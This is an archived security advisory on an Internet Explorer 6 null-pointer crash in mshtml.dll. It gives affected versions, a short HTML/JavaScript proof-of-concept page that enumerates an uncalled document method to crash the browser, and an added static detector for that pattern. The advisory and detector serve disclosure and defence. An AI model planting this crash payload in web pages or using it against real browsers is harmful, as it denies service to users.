MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)
http://www.securiteam.com

MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
------------------------------------------------------------------------

SUMMARY

Microsoft Internet Explorer version 6 crashes when you open the attached HTML page; this is due to its attempt to dereference a NULL pointer.

DETAILS

Vulnerable Systems:
 * Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000 Advanced Server)
 * Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)

Exploit:
<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - amesianx@gmail.com)
+ Critical: Critical
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System:
    Windows XP SP2 FULL PATCHED (Korean Language)
    Windows 2000 Advanced Server (Korean Language)
+ Tested Software:
    Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
    Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description: The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug will crash when executing a 'for' script.
+ The following proof-of-concept is also available: http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->

Code:
<html>
 <head>
  <title>AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com)</title>
 </head>
 <body>
  <script language='javascript'>
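   // Take a reference to the method itself (it is never called)
   var data = document['getElementById'];
   // The for-in enumeration over that reference is the step reported to crash IE 6
   for(var key in data);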
  </script>
 </body>
</html>

ADDITIONAL INFORMATION

The original article can be found at: hxxp://www.milw0rm.com/exploits/3272
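
A static check for the construct the proof-of-concept uses, added here as an example and not part of the original advisory or the exploit author's code: it flags inline scripts that run a for-in loop over an uncalled document method reference, directly or through a variable. The function names, the watched-method parameter and the benign sample are assumptions made for this example, and the match is a heuristic on this exact pattern.

```javascript
// Added example, not from the advisory: static heuristic for the PoC's construct.
// REF matches document.name or document['name'] and captures the member name.
const REF = String.raw`document\s*(?:\.\s*(\w+)|\[\s*['"](\w+)['"]\s*\])`;

// Return the bodies of inline <script> elements.
function inlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return Array.from(html.matchAll(re), (m) => m[1]);
}

// Find for-in loops whose target is an uncalled document method reference,
// either directly or through a variable that was assigned the reference.
// `watched` defaults to the one method named in the advisory (hypothetical parameter).
function findMethodEnumeration(html, watched = ['getElementById']) {
  const findings = [];
  for (const js of inlineScripts(html)) {
    // Pass 1: aliases such as `data = document['getElementById']`.
    // The lookahead rejects calls like document.getElementById('x').
    const aliases = new Map();
    const assign = new RegExp(String.raw`(\w+)\s*=\s*${REF}(?!\s*[\w(])`, 'g');
    for (const m of js.matchAll(assign)) {
      const method = m[2] || m[3];
      if (watched.includes(method)) aliases.set(m[1], method);
    }
    // Pass 2: for-in over the reference itself or over a recorded alias.
    const loop = new RegExp(
      String.raw`for\s*\(\s*(?:var\s+)?\w+\s+in\s+(?:${REF}|(\w+))\s*\)`, 'g');
    for (const m of js.matchAll(loop)) {
      const method = m[1] || m[2] || aliases.get(m[3]);
      if (method && watched.includes(method)) {
        findings.push({ method, via: m[3] || 'direct' });
      }
    }
  }
  return findings;
}

// Sample 1 is the script from the advisory above; sample 2 is constructed benign markup.
const POC_PAGE = "<script language='javascript'>\n var data = document['getElementById'];\n" +
  " for(var key in data);\n</script>";
const BENIGN_PAGE = "<script>var el = document.getElementById('main');" +
  " for (var k in el) {}</script>";

console.log(findMethodEnumeration(POC_PAGE));
console.log(findMethodEnumeration(BENIGN_PAGE));
```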